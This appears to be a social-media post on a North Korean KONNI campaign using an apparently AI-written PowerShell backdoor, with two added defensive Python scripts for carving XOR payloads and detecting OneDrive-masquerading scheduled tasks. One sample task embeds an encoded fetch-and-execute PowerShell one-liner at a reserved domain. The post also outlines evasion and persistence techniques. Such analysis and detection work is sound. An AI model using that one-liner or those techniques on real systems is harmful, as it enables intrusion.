

North Korean hacking group KONNI used an AI-written backdoor to attack its victims.

North Korea is not a great power, but it has some of the best hackers in the world, and hardly a day passes without someone being hit by hacking or malware traced back to this small country. The latest news will give many people fresh cause for concern.

According to a report on the website Security Affairs, a new campaign has been detected from the North Korean group KONNI (also tracked as Kimsuky, Earth Imp, TA406, Thallium, Vedalia and Velvet Chollima). It is a phishing campaign aimed at software developers in the Asia-Pacific (APAC) region: the lure is a fake project document claiming to describe a new blockchain and cryptocurrency project, which the victims are tricked into downloading. The targeting was not limited to South Korea, North Korea's long-time adversary, but gradually spread to other countries such as Japan, Australia and India.

As for how the malware gets onto the machine, sources explain that it starts with the hackers sending the victim a link, claiming it is a new project the victim is invited to join. The link points to a file hosted on Discord's chat platform. Clicking it downloads a ZIP file that, once extracted, yields two files: a PDF used as a decoy to distract the victim, and a Windows shortcut (LNK) file named to look like a .DOCX document. If the victim opens the shortcut, it launches a PowerShell script that unpacks two files embedded in the LNK: a real .DOCX with essentially the same name as the shortcut (another decoy document) and a CAB archive containing the malware payload. Both are stored inside the LNK file encoded with single-byte XOR.
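The single-byte XOR encoding described above is weak enough that an analyst can recover both embedded files without knowing the key, by searching the dropper for each file's magic bytes under every possible key. The script below is an added example, not code from the original post or from Check Point's report: the LNK it builds is a constructed stand-in (a genuine ShellLink header, filler, then the two encoded files appended back to back), the .docx is a minimal real ZIP and the CAB is only a header stub. The assumption that the two payloads are adjacent, and that one key is reused for both, is taken from the description in the text.

```python
"""Carve single-byte-XOR-encoded payloads out of an LNK dropper.

Added example; not code from the original post or from Check Point's report.
The LNK below is a constructed stand-in (real header bytes, filler, then the
two encoded files appended), so the carving is magic-based, not offset-based,
and should transfer to real samples where the XOR key is unknown.
"""
import io
import re
import zipfile

# ShellLink header: HeaderSize 0x4C followed by the LNK CLSID
# 00021401-0000-0000-C000-000000000046.
LNK_HEADER = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")

# Signatures of the two embedded files the post describes: a real .docx
# (a ZIP container) and a CAB archive.
MAGICS = {"docx": b"PK\x03\x04", "cab": b"MSCF"}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def find_xor_payloads(blob: bytes, magics=MAGICS) -> dict:
    """For every key 1..255, XOR each magic with the key and look for that
    needle in the raw blob (cheaper than decoding the whole file 255 times).
    Returns {key: [(offset, kind), ...]} sorted by offset."""
    hits = {}
    for key in range(1, 256):
        for kind, magic in magics.items():
            needle = re.escape(xor_bytes(magic, key))
            for m in re.finditer(needle, blob):
                hits.setdefault(key, []).append((m.start(), kind))
    return {k: sorted(v) for k, v in hits.items()}


def extract_payloads(blob: bytes, magics=MAGICS):
    """Choose the key that explains the most embedded files (the dropper reuses
    one key for both) and carve each payload up to the start of the next.
    Consecutive hits of the same kind are merged: a ZIP holds one local file
    header per entry, and only the first marks the start of the .docx."""
    hits = find_xor_payloads(blob, magics)
    if not hits:
        return None, {}
    key = max(hits, key=lambda k: len(hits[k]))
    starts = []
    for offset, kind in hits[key]:
        if not starts or starts[-1][1] != kind:
            starts.append((offset, kind))
    payloads = {}
    for i, (start, kind) in enumerate(starts):
        end = starts[i + 1][0] if i + 1 < len(starts) else len(blob)
        payloads[kind] = xor_bytes(blob[start:end], key)
    return key, payloads


def docx_entries(data: bytes) -> list:
    """Names inside a carved .docx, as a sanity check that it is a valid ZIP."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.namelist()


def build_sample_lnk(key: int = 0x5A):
    """Constructed dropper: header, filler, then the XOR-encoded .docx and CAB
    back to back. The CAB is only a header stub; the .docx is a real ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
    docx = buf.getvalue()
    cab = b"MSCF" + b"\x00" * 32 + b"<constructed CAB body>"
    blob = LNK_HEADER + b"\x00" * 64 + xor_bytes(docx, key) + xor_bytes(cab, key)
    return blob, docx, cab


if __name__ == "__main__":
    blob, docx, cab = build_sample_lnk()
    key, payloads = extract_payloads(blob)
    print(f"key=0x{key:02x}", {k: len(v) for k, v in payloads.items()})
    print("docx entries:", docx_entries(payloads["docx"]))
```

On a real sample, read the LNK from disk in place of build_sample_lnk() and write each carved payload to its own file; if the two files are separated by a length field or other metadata, the carved .docx will carry that trailing data, which a ZIP reader tolerates because it locates the central directory from the end of the archive.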

Next, the script inside the CAB file establishes persistence by creating a scheduled task, naming it after a normal OneDrive system task so that it blends in. It then runs the backdoor, an obfuscated PowerShell script. This stage runs directly in memory, which makes it harder to detect.
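A scheduled task that borrows OneDrive's name but launches a hidden, encoded PowerShell command is exactly the kind of thing a defender can hunt for in the task definitions themselves. The detector below is an added example, not code from the original post or from Check Point's report: it parses Task Scheduler XML (the format stored under C:\Windows\System32\Tasks, and what Export-ScheduledTask emits), checks whether a task named like OneDrive actually points at the OneDrive updater, flags script hosts and hidden/encoded/bypass switches, and decodes any -EncodedCommand to look for in-memory loader markers. Both task definitions are constructed samples; the legitimate OneDrive updater path is an assumption about a per-user install, and the stage-2 command points at a reserved domain.

```python
"""Flag scheduled tasks that borrow OneDrive's name but run a script host.

Added example; not code from the original post or from Check Point's report.
Parses Task Scheduler XML (C:\\Windows\\System32\\Tasks, Export-ScheduledTask).
The two task definitions are constructed samples; the genuine OneDrive
updater path is an assumption about a per-user install.
"""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

ONEDRIVE_NAME = re.compile(r"onedrive", re.I)
# Assumed location of the real updater the genuine OneDrive tasks point at.
ONEDRIVE_BIN = re.compile(r"\\Microsoft\\OneDrive\\OneDrive(StandaloneUpdater)?\.exe$", re.I)
SCRIPT_HOSTS = re.compile(
    r"(^|\\)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)(\.exe)?$", re.I)
SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"
    r"|bypass|iex\b|invoke-expression|downloadstring|frombase64string", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
PAYLOAD_MARKERS = re.compile(
    r"iex\b|invoke-expression|downloadstring|frombase64string|invoke-webrequest", re.I)


def decode_encoded_command(args: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE text; return it or None."""
    m = ENC_FLAG.search(args or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_task(xml_text: str) -> list:
    """Return one finding per suspicious trait; an empty list means clean."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    findings = []
    for action in root.findall("t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).strip()
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        # Name says OneDrive, binary is not the OneDrive updater: masquerade.
        if ONEDRIVE_NAME.search(uri) and not ONEDRIVE_BIN.search(cmd):
            findings.append(f"{uri}: named like OneDrive but runs {cmd}")
        if SCRIPT_HOSTS.search(cmd):
            findings.append(f"{uri}: action is a script host: {cmd}")
        if SUSPICIOUS_ARGS.search(args):
            findings.append(f"{uri}: hidden/encoded/bypass switches: {args[:60]}")
        decoded = decode_encoded_command(args)
        marker = PAYLOAD_MARKERS.search(decoded) if decoded else None
        if marker:
            findings.append(f"{uri}: decoded command uses {marker.group(0)}")
    return findings


def task_xml(uri: str, command: str, arguments: str = "") -> str:
    """Minimal Task Scheduler XML (constructed) with one Exec action."""
    return f"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>{uri}</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec>
  </Actions>
</Task>"""


LEGIT_TASK = task_xml(
    r"\OneDrive Standalone Update Task-S-1-5-21-1111111111-222222222-3333333333-1001",
    r"%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe")

# Constructed stage 2: a hidden one-liner that fetches and evaluates a script
# in memory, the pattern the post describes (reserved domain, nothing real).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
MALICIOUS_TASK = task_xml(
    r"\OneDrive Update Task",
    "powershell.exe",
    f"-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {ENCODED}")

if __name__ == "__main__":
    for name, xml_text in (("legit", LEGIT_TASK), ("malicious", MALICIOUS_TASK)):
        print(name, analyse_task(xml_text) or "clean")
```

To sweep a host, feed every file under C:\Windows\System32\Tasks to analyse_task() (they are XML without an extension; a few are UTF-16 and need decoding first). Matching on the task name alone is not enough, because the genuine OneDrive tasks exist on most workstations; the signal is the gap between what the name claims and what the action runs.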

The key part is the backdoor itself, delivered as a PowerShell script. The research team at Check Point, the cyber-defence company that detected the malware, said that an examination of the code showed many signs that it was written with the help of AI, specifically a large language model (LLM): verbose documentation, a modular layout, and comments that read like instructions to a user, such as "Your permanent project UUID", all point to LLM-generated code. The researchers added that, comparing this malware and the attack methods with past activity, they could conclude that the KONNI group is behind the malware and the campaign, based on its use of LNK files and of malware that is characteristic of this group.

Beyond the notable fact that the malware is AI-generated, it also has a long list of capabilities: sandbox evasion, anti-analysis checks, user-interaction validation (confirming a real user is present before it runs), and single-instance enforcement via a global mutex. It also fingerprints the host so the command-and-control (C2) server can track each victim, and adapts its behaviour to the privilege level of the victim's system. It can bypass User Account Control (UAC), deal with Windows Defender, and install remote monitoring and management (RMM) software for persistence, so the hackers can log in to the victim at any time. It can also handle JavaScript challenges to get past web protection layers, which lets it receive commands and exfiltrate files to the C2 server.

#Trending #Lemon8Howtoo #lemon8diary #freedomhack #it

2/14 (edited)

From my own experience following cyber-threat news, the KONNI hacker group from North Korea is using advanced technology like AI to build a backdoor that is complex and hard to detect. The malware's use of PowerShell scripts with single-byte XOR encoding and a modular layout shows a new approach to attacks that emphasises efficiency and evasion of sandboxes and other detection systems. In addition, persistence through a scheduled task named like a normal system component such as OneDrive lets the malware stay embedded in the system unobtrusively, and features such as user-interaction validation, a global mutex and host fingerprinting harden the malware so it can fully control the target machine and is hard to shut down. For ordinary users and programmers, it is important to be careful about downloading files from untrusted sources, especially links received through chat platforms like Discord, which can be used as a channel for spreading malware. Keeping software and the operating system updated, and using antivirus software that can detect malware using obfuscation techniques, will greatly reduce the risk. Finally, I recommend following cyber-security news from trusted sources and sharing it with colleagues in IT or development to raise awareness and to prevent threats together more widely.
